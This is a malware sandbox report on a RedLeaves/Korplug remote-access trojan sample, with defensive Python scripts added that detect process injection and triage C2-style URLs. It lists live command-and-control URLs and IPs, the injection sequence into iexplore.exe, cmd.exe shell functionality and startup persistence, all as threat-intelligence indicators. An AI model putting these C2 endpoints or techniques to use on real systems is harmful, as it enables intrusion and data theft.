Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,2_2_03027750
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,2_2_03026AF4
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,2_2_0302C81E
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,__calloc_crt,_free,2_2_03024E41
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: GetLastError,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,2_2_04B64DAD
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,2_2_04B6C6B0
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_04B67E91
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: GetLocaleInfoA,2_2_04B5D7AC
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: GetLocaleInfoA,2_2_04B67F86
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,2_2_04B68088
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: GetLocaleInfoW,2_2_04B6802D
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: GetLocaleInfoA,2_2_04B68259
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,2_2_04B683BC
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: EnumSystemLocalesA,2_2_04B68380
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: GetLocaleInfoA,2_2_04B6CBDB
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: EnumSystemLocalesA,2_2_04B68319
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,3_2_0040610C
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,3_2_00406217
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: GetLocaleInfoA,3_2_0040C46C
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: GetLocaleInfoA,3_2_0040C420
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: GetLocaleInfoA,3_2_00406A94
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: GetLocaleInfoA,GetACP,3_2_0040DB00
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,3_2_6EE5CB7A
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,3_2_6EE5C88C
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,3_2_6EE600B0
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_04B50396 CreateMutexW,GetLastError,CreateNamedPipeW,CloseHandle,CreateEventW,ResetEvent,ResetEvent,ConnectNamedPipe,GetLastError,WaitForSingleObject,CloseHandle,CloseHandle,CloseHandle,CloseHandle,ResetEvent,AllocConsole,GetConsoleWindow,ShowWindow,SetConsoleCtrlHandler,CreateConsoleScreenBuffer,SetConsoleScreenBufferSize,SetConsoleActiveScreenBuffer,GetStdHandle,SHGetSpecialFolderPathW,CreateProcessW,FreeLibrary,CreateThread,CreateThread,CreateThread,FreeLibrary,2_2_04B50396
Source: C:\Users\user\Desktop\cANdLlHS4N.exeCode function: 0_2_00AB6E0F GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00AB6E0F
Source: C:\Users\user\Desktop\cANdLlHS4N.exeCode function: 0_2_00ABBE8D __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,0_2_00ABBE8D
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 1_2_00450214 GetVersion,1_2_00450214
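The memory and process lines at the top of this section are the classic remote-injection sequence: obedience.exe creates its own iexplore.exe, allocates two page-execute-read-and-write regions in it (0x3000000 and 0x2D00000) and writes into the first one, plus a second write at 0x923650 that has no matching allocation. The anti-debugging list corroborates that the first region runs: the PEB read at 2_2_03000019 sits inside it. The script below is an added example and not part of the Joe Sandbox report. It parses behaviour lines in the glued "Source: <path><event>: <details>" form of this export, collects what each source process did to each target process, and flags a source that wrote into an executable region it allocated in a different process, independent of line order (the report groups lines by signature, not by time). The five sample lines are the report's own, embedded as constructed input; the line grammar, and the assumption that the first ".exe " token in a "Process created" line ends the image path, are mine.

```python
import json
import re
from collections import defaultdict
from dataclasses import dataclass, field

# Constructed input: the cross-process lines from this report's HIPS/PFW section,
# as the HTML export glues the source path to the event name. A trailing
# "Jump to behavior" link text, if still present, is ignored by the parser.
SAMPLE_LINES = r"""
Source: C:\Users\user\AppData\Local\Temp\obedience.exeMemory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 3000000
Source: C:\Users\user\AppData\Local\Temp\obedience.exeMemory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 923650
Source: C:\Users\user\AppData\Local\Temp\obedience.exeMemory allocated: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 3000000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\obedience.exeMemory allocated: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 2D00000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\obedience.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\iexplore.exe
""".strip().splitlines()

EVENTS = ("Memory written", "Memory allocated", "Process created")
LINE_RE = re.compile(
    r"^Source: (?P<src>.+?)(?P<event>" + "|".join(EVENTS) + r"): "
    + r"(?P<rest>.+?)(?:Jump to behavior)?$"
)
MEM_RE = re.compile(r"^(?P<target>.+?) base: (?P<base>[0-9A-Fa-f]+)(?: protect: (?P<protect>.+))?$")
# Assumption: the first ".exe " ends the created image path, the rest is its command line.
PROC_RE = re.compile(r"^(?P<target>.+?\.exe) (?P<cmdline>.+)$")


@dataclass
class Interaction:
    """Everything one source process did to one target process."""
    exec_allocs: set = field(default_factory=set)   # bases allocated with an execute protection
    other_allocs: set = field(default_factory=set)  # bases allocated without execute
    writes: set = field(default_factory=set)        # bases written
    spawned: bool = False                            # source created the target


def parse_report_lines(lines):
    pairs = defaultdict(Interaction)
    for raw in lines:
        m = LINE_RE.match(raw.strip())
        if not m:
            continue
        src, event, rest = m.group("src"), m.group("event"), m.group("rest")
        if event == "Process created":
            pm = PROC_RE.match(rest)
            if pm:
                pairs[(src, pm.group("target"))].spawned = True
            continue
        mm = MEM_RE.match(rest)
        if not mm:
            continue
        it = pairs[(src, mm.group("target"))]
        base = int(mm.group("base"), 16)
        if event == "Memory written":
            it.writes.add(base)
        elif "execute" in (mm.group("protect") or "").lower():
            it.exec_allocs.add(base)
        else:
            it.other_allocs.add(base)
    return pairs


def find_injection(lines):
    """Flag every (source, target) pair in which the source wrote into an executable
    region it had allocated inside a different process."""
    findings = []
    for (src, target), it in parse_report_lines(lines).items():
        if src.lower() == target.lower():
            continue  # self-modification is not cross-process injection
        written_exec = it.writes & it.exec_allocs
        if not written_exec:
            continue
        findings.append({
            "injector": src,
            "target": target,
            "exec_regions_written": [hex(b) for b in sorted(written_exec)],
            "exec_regions_unwritten": [hex(b) for b in sorted(it.exec_allocs - it.writes)],
            # writes with no allocation by the source: patching memory the target already had
            "writes_to_existing_memory": [hex(b) for b in sorted(it.writes - it.exec_allocs - it.other_allocs)],
            "target_spawned_by_injector": it.spawned,
        })
    return findings


if __name__ == "__main__":
    print(json.dumps(find_injection(SAMPLE_LINES), indent=2))
```

On this report the script yields one finding: obedience.exe injecting into an iexplore.exe it spawned itself, with 0x3000000 allocated executable and written, 0x2D00000 allocated executable but with no recorded write, and 0x923650 written without a preceding allocation by the injector. The unwritten region and the write into pre-existing memory are worth keeping in the output rather than dropping: the first is a second stage that may have been written by an API the sandbox does not log, the second is typically a patch to code or data the target already mapped.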

Remote Access Functionality

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_04B50396 CreateMutexW,GetLastError,CreateNamedPipeW,CloseHandle,CreateEventW,ResetEvent,ResetEvent,ConnectNamedPipe,GetLastError,WaitForSingleObject,CloseHandle,CloseHandle,CloseHandle,CloseHandle,ResetEvent,AllocConsole,GetConsoleWindow,ShowWindow,SetConsoleCtrlHandler,CreateConsoleScreenBuffer,SetConsoleScreenBufferSize,SetConsoleActiveScreenBuffer,GetStdHandle,SHGetSpecialFolderPathW,CreateProcessW,FreeLibrary,CreateThread,CreateThread,CreateThread,FreeLibrary, string: cmd.exe2_2_04B50396
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_04B5623C htons,htons,socket,getpeername,socket,socket,htons,htonl,bind,2_2_04B5623C
MITRE ATT&CK matrix. The figures in front of a technique are the report's hit-count badges for that cell; techniques without a figure are the unmatched entries of the template grid.

Initial Access: 1 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: 2 Native API; 1 Command and Scripting Interpreter; At (Linux); At (Windows); Cron; Launchd; Scheduled Task
Persistence: 1 Valid Accounts; 2 Registry Run Keys / Startup Folder; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
Privilege Escalation: 1 Valid Accounts; 1 Access Token Manipulation; 212 Process Injection; 2 Registry Run Keys / Startup Folder; Network Logon Script; Rc.common; Startup Items
Defense Evasion: 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 Software Packing; 11 Masquerading; 1 Valid Accounts; 1 Access Token Manipulation; 212 Process Injection
Credential Access: 21 Input Capture; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: 2 System Time Discovery; 3 File and Directory Discovery; 35 System Information Discovery; 14 Security Software Discovery; 2 Process Discovery; 11 Application Window Discovery; Network Sniffing
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: 1 Archive Collected Data; 1 Screen Capture; 21 Input Capture; 2 Clipboard Data; Keylogging; GUI Input Capture; Web Portal Capture
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Command and Control: 1 Ingress Tool Transfer; 22 Encrypted Channel; 1 Non-Standard Port; 1 Remote Access Software; 1 Non-Application Layer Protocol; 2 Application Layer Protocol; Commonly Used Port
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features
Impact: Modify System Partition; Device Lockout; Delete Device Data; Data Encrypted for Impact
Antivirus detection, submitted sample (source, detection, scanner, label):
cANdLlHS4N.exe   78%   Virustotal
cANdLlHS4N.exe   65%   Metadefender
cANdLlHS4N.exe   84%   ReversingLabs   Win32.Dropper.RedLeaves
cANdLlHS4N.exe   100%  Avira           TR/Korplug.dryww

Antivirus detection, dropped files (source, detection, scanner, label):
C:\Users\user\AppData\Local\Temp\StarBurn.dll    100%  Avira           HEUR/AGEN.1226539
C:\Users\user\AppData\Local\Temp\obedience.exe   8%    Metadefender
C:\Users\user\AppData\Local\Temp\obedience.exe   9%    ReversingLabs   Win32.PUA.Tsingsoft

Antivirus detection, unpacked memory dumps (source, detection, scanner, label; each dump is downloadable from the report):
3.2.obedience.exe.400000.0.unpack      100%  Avira  HEUR/AGEN.1232827
3.2.obedience.exe.6ee50000.1.unpack    100%  Avira  HEUR/AGEN.1226539
1.2.obedience.exe.6ed90000.1.unpack    100%  Avira  HEUR/AGEN.1226539
0.2.cANdLlHS4N.exe.2880000.3.unpack    100%  Avira  TR/ATRAPS.Gen
1.2.obedience.exe.400000.0.unpack      100%  Avira  HEUR/AGEN.1232827

Antivirus detection, domains: no matches (no contacted domains).

Antivirus detection, URLs (source, detection, scanner, label):
http://67.205.132.17:443                               1%   Virustotal
http://67.205.132.17:443                               0%   Avira URL Cloud   safe
http://secure.globalsign.net/cacert/PrimObject.crt0    0%   URL Reputation    safe
http://secure.globalsign.net/cacert/ObjectSign.crt09   0%   URL Reputation    safe
http://www.globalsign.net/repository09                 0%   URL Reputation    safe
https://67.205.132.17:443/23I9/index.php               0%   Avira URL Cloud   safe
https://67.205.132.17:443/NEZTl2/index.php             0%   Avira URL Cloud   safe
https://67.205.132.17:443/hvnqlRD8z/index.php          0%   Avira URL Cloud   safe
http://www.globalsign.net/repository/0                 0%   URL Reputation    safe
https://67.205.132.17:443/M2c1Nb/index.php             0%   Avira URL Cloud   safe
https://67.205.132.17:443/3T3t/index.php               0%   Avira URL Cloud   safe
http://www.globalsign.net/repository/03                0%   URL Reputation    safe
Contacted URLs (name, malicious, antivirus detection, reputation):
https://67.205.132.17:443/23I9/index.php        malicious: true   Avira URL Cloud: safe   reputation: unknown
https://67.205.132.17:443/NEZTl2/index.php      malicious: true   Avira URL Cloud: safe   reputation: unknown
https://67.205.132.17:443/hvnqlRD8z/index.php   malicious: true   Avira URL Cloud: safe   reputation: unknown
https://67.205.132.17:443/M2c1Nb/index.php      malicious: true   Avira URL Cloud: safe   reputation: unknown
https://67.205.132.17:443/3T3t/index.php        malicious: true   Avira URL Cloud: safe   reputation: unknown
URLs found in process memory and dropped files (name; source; malicious; antivirus detection; reputation):
http://67.205.132.17:443
  source: iexplore.exe, 00000002.00000002.500224676.0000000004C70000.00000004.00000020.00020000.00000000.sdmp
  malicious: false; Virustotal: 1%; Avira URL Cloud: safe; reputation: unknown
http://secure.globalsign.net/cacert/PrimObject.crt0
  source: cANdLlHS4N.exe, 00000000.00000002.246524283.00000000029EF000.00000004.00000800.00020000.00000000.sdmp; cANdLlHS4N.exe, 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp; obedience.exe.0.dr
  malicious: false; URL Reputation: safe; reputation: unknown
http://secure.globalsign.net/cacert/ObjectSign.crt09
  source: cANdLlHS4N.exe, 00000000.00000002.246524283.00000000029EF000.00000004.00000800.00020000.00000000.sdmp; cANdLlHS4N.exe, 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp; obedience.exe.0.dr
  malicious: false; URL Reputation: safe; reputation: unknown
http://www.globalsign.net/repository09
  source: cANdLlHS4N.exe, 00000000.00000002.246524283.00000000029EF000.00000004.00000800.00020000.00000000.sdmp; cANdLlHS4N.exe, 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp; obedience.exe.0.dr
  malicious: false; URL Reputation: safe; reputation: unknown
http://www.audio-tool.net
  source: cANdLlHS4N.exe, 00000000.00000002.246215033.0000000002880000.00000004.00000800.00020000.00000000.sdmp; cANdLlHS4N.exe, 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp; obedience.exe, 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp; obedience.exe, 00000003.00000000.262529824.0000000000496000.00000002.00000001.01000000.00000004.sdmp; obedience.exe.0.dr
  malicious: false; reputation: high
http://www.globalsign.net/repository/0
  source: cANdLlHS4N.exe, 00000000.00000002.246524283.00000000029EF000.00000004.00000800.00020000.00000000.sdmp; cANdLlHS4N.exe, 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp; obedience.exe.0.dr
  malicious: false; URL Reputation: safe; reputation: unknown
http://www.globalsign.net/repository/03
  source: cANdLlHS4N.exe, 00000000.00000002.246524283.00000000029EF000.00000004.00000800.00020000.00000000.sdmp; cANdLlHS4N.exe, 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp; obedience.exe.0.dr
  malicious: false; URL Reputation: safe; reputation: unknown
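The five C2 URLs in the tables above share one shape: a bare public IP, ":443" spelled out on an https URL, and a single short mixed-case alphanumeric directory in front of index.php. Avira URL Cloud rated every one of them safe while the sandbox marked them malicious, which is how a freshly stood-up C2 looks to any reputation feed. The script below is an added example, not part of the report: a structural triage over URLs (proxy logs, sandbox output) that scores those three properties and flags a URL showing at least two of them. The scoring rules and the threshold are mine; the first seven sample URLs are the report's own and the last one is made up to show a one-signal near miss.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Constructed input: the report's C2 URLs, two benign URLs from the same report, and
# one made-up URL (private IP, one signal only) to exercise the threshold.
SAMPLE_URLS = [
    "https://67.205.132.17:443/23I9/index.php",
    "https://67.205.132.17:443/NEZTl2/index.php",
    "https://67.205.132.17:443/hvnqlRD8z/index.php",
    "https://67.205.132.17:443/M2c1Nb/index.php",
    "https://67.205.132.17:443/3T3t/index.php",
    "http://secure.globalsign.net/cacert/PrimObject.crt",
    "http://www.audio-tool.net",
    "https://192.168.2.1/x7Yz/index.php",
]

RANDOM_DIR_RE = re.compile(r"[A-Za-z0-9]{3,12}")
DEFAULT_PORTS = {"https": 443, "http": 80}


def url_indicators(url):
    """Return the list of weak signals this URL shows; an empty list means nothing odd."""
    reasons = []
    parts = urlsplit(url)
    host = parts.hostname or ""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        ip = None

    # 1. TLS to a bare public IP: no hostname for a certificate or for DNS telemetry.
    if ip is not None and ip.is_global:
        reasons.append("public IP literal instead of a hostname")

    # 2. Default port written out. Browsers and HTTP libraries normalise it away; a
    #    literal ":443" usually means code assembled the URL from host/port config.
    default_port = DEFAULT_PORTS.get(parts.scheme)
    if default_port is not None and parts.netloc.endswith(f":{default_port}"):
        reasons.append("default port written explicitly")

    # 3. Exactly one random-looking directory (letters and digits mixed) before index.php.
    segs = [s for s in parts.path.split("/") if s]
    if (len(segs) == 2 and segs[1].lower() == "index.php"
            and RANDOM_DIR_RE.fullmatch(segs[0])
            and any(c.isdigit() for c in segs[0])
            and any(c.isalpha() for c in segs[0])):
        reasons.append("random directory before index.php")
    return reasons


def triage(urls, threshold=2):
    """Map each URL that reaches the threshold to the signals it showed."""
    flagged = {}
    for url in urls:
        reasons = url_indicators(url)
        if len(reasons) >= threshold:
            flagged[url] = reasons
    return flagged


if __name__ == "__main__":
    for url, reasons in triage(SAMPLE_URLS).items():
        print(url, "->", "; ".join(reasons))
```

Each signal on its own is common in benign traffic (internal tools on IPs, hand-typed ports, PHP front pages), which is why the function returns the reasons rather than a verdict and the threshold is a parameter: tune it against your own proxy logs before alerting on it.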
Contacted IPs (IP, domain, country, ASN, ASN name, malicious):
144.168.45.116   unknown   United States   54540   INCERO-HVVCUS        false
67.205.132.17    unknown   United States   14061   DIGITALOCEAN-ASNUS   true
Private IPs: 192.168.2.1
    Joe Sandbox Version:34.0.0 Boulder Opal
    Analysis ID:586425
    Start date:10.03.2022
    Start time:07:20:28
    Joe Sandbox Product:CloudBasic
    Overall analysis duration:0h 11m 8s
    Hypervisor based Inspection enabled:false
    Report type:full
    Sample file name:cANdLlHS4N (renamed file extension from none to exe)
    Cookbook file name:default.jbs
    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
    Number of new started processes analysed:14
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • HDC enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Detection:MAL
    Classification:mal100.troj.evad.winEXE@8/4@0/3
    EGA Information:
    • Successful, ratio: 100%
    HDC Information:
    • Successful, ratio: 27.5% (good quality ratio 26.9%)
    • Quality average: 82.1%
    • Quality standard deviation: 23.5%
    HCA Information:
    • Successful, ratio: 87%
    • Number of executed functions: 114
    • Number of non-executed functions: 357
    Cookbook Comments:
    • Adjust boot time
    • Enable AMSI
    • Exclude process from analysis (whitelisted): MpCmdRun.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
    • Excluded domains from analysis (whitelisted): fs.microsoft.com
    • Not all processes were analyzed, report is missing behavior information
    • Report creation exceeded maximum time and may have missing disassembly code information.
    • Report size exceeded maximum capacity and may have missing disassembly code.
    • Report size getting too big, too many NtOpenKeyEx calls found.
    • Report size getting too big, too many NtQueryValueKey calls found.
Autostart entries (time, type, description):
07:21:35   Autostart   Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\persuasion.lnk
Other samples previously seen contacting the same ASNs (associated sample, contacted IP); every entry is flagged malicious:
INCERO-HVVCUS (AS54540):
  Zxk5N1NInW.dll                  104.251.214.46
  480130269411023062.xls          104.251.214.46
  JgLtXCuKO1.dll                  104.251.214.46
  Invoice.xls                     104.251.214.46
  adP3gvhbFy.xls                  104.251.214.46
  test.xls                        104.251.214.46
  test.xls                        104.251.214.46
  BMRtHXBgME.xlsx                 104.251.214.46
  sample2.dll                     104.251.214.46
  EXT Payment status.xls          104.251.214.46
  MDZ6293866113 invoice.xls       104.251.214.46
  PTdIj2z8va.dll                  104.251.214.46
  3ssLTGLlDq.dll                  104.251.214.46
  Payment Confirmation.xls        104.251.214.46
  ArDm2v8wD2.dll                  104.251.214.46
  ArDm2v8wD2.dll                  104.251.214.46
  sample.dll                      104.251.214.46
  ovzuqEdLPW.xls                  104.251.214.46
  sample.dll                      104.251.214.46
  Ommega_10.xls                   104.251.214.46
DIGITALOCEAN-ASNUS (AS14061):
  Dhlinvoice.exe                                          164.90.194.235
  lv4YnDgTEQ.dll                                          128.199.192.135
  Factura Proforma.xlsx                                   164.90.194.235
  Datei 7563091663.xlsm                                   128.199.192.135
  ohne Titel_0903.xlsm                                    128.199.192.135
  Daten-0903.xlsm                                         128.199.192.135
  Pack-564.xlsm                                           128.199.192.135
  SecuriteInfo.com.Trojan.GenericKD.39062394.12645.exe    206.189.100.203
  SyPFqX9yDb.dll                                          128.199.192.135
  TqxMibPJh6.exe                                          174.138.9.123
  1dECJNMZg9.dll                                          128.199.192.135
  16aDA1C0fz.dll                                          128.199.192.135
  D1YCISnN44.dll                                          128.199.192.135
  II4tcMX36v.dll                                          128.199.192.135
  ZsVX7IUcoK.dll                                          128.199.192.135
  DGekq4g1qR.dll                                          128.199.192.135
  o47ExhSpP7K.dll                                         128.199.192.135
  emotionaldamage.dll                                     178.128.83.165
  eJVPkEP8QS                                              206.189.138.201
  0NG42A8U4P                                              138.68.185.187
    Process:C:\Users\user\Desktop\cANdLlHS4N.exe
    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
    Category:dropped
    Size (bytes):134244
    Entropy (8bit):6.439912486566814
    Encrypted:false
    SSDEEP:3072:JmeUE3TxGh4MwlW7AzD7Lcv4L2ZbDdlWG/4:Jm7EUhTwljDS4LevXWGg
    MD5:A03FFF06A20EE6943154481C883174A8
    SHA1:4470E24C366AD001ED6FE77B6A09C845D4EF6A86
    SHA-256:2F3C5A34E0483A5F1739AFAA3E893955F4D81869506A49F28F6A3AC944050900
    SHA-512:DCF944225471940C4C84F31A1409715EB1AE0B68AA1DA21ADCA23477D3C589D8D15213BAA3C105710D532190570C55492885E515220E3B18941096571A292A73
    Malicious:true
    Yara Hits:
    • Rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn, Description: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT, Source: C:\Users\user\AppData\Local\Temp\StarBurn.dll, Author: USG
    • Rule: OpCloudHopper_Malware_6, Description: Detects malware from Operation Cloud Hopper, Source: C:\Users\user\AppData\Local\Temp\StarBurn.dll, Author: Florian Roth
    Antivirus:
    • Antivirus: Avira, Detection: 100%
    Reputation:low
    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.^...0...0...0.~...<.0.~.....0.~...e.0.......0.......0...1.N.0.~.....0.~.....0.~.....0.Rich..0.........................PE..L...|..X...........!.....J...........u.......`...............................p......9.....@.........................`....,.....x....0.......................@..........................................@............`..|............................text...xI.......J.................. ..`.rdata..]....`.......N..............@..@.data...\7..........................@....rsrc........0......................@..@.reloc...#...@...$..................@..B................................................................................................................................................................................................................................................................................................................
    Process:C:\Users\user\Desktop\cANdLlHS4N.exe
    File Type:data
    Category:dropped
    Size (bytes):254593
    Entropy (8bit):6.992551822422355
    Encrypted:false
    SSDEEP:6144:cMq9yyNTKrkgMEVAUtmEXlW+/xf8GQ6/Ta2QSirGf23YJKRluri9Zoqip3:Q9lNTokREm0mN+/uGQ6/O2orsKHt9Zo1
    MD5:FB0C714CD2EBDCC6F33817ABE7813C36
    SHA1:FC4F3698E768F690425523CDFD548B81D891C3B0
    SHA-256:773B176B3A68C3D21FAE907AF8FBA7908B55726BD591C5335C8C0BC9DE179B76
    SHA-512:65EF996A9A9BD47D50F7649C7895D000C943346B17385390B951691CEC07ED7AA487CA3225EE84022B67643F2A574E7DE8C18F81F2576F0BE92BD3930EE9FDC6
    Malicious:false
    Yara Hits:
    • Rule: REDLEAVES_DroppedFile_ObfuscatedShellcodeAndRAT_handkerchief, Description: Detect obfuscated .dat file containing shellcode and core REDLEAVES RAT, Source: C:\Users\user\AppData\Local\Temp\handkerchief.dat, Author: USG
    • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: C:\Users\user\AppData\Local\Temp\handkerchief.dat, Author: Florian Roth
    Reputation:low
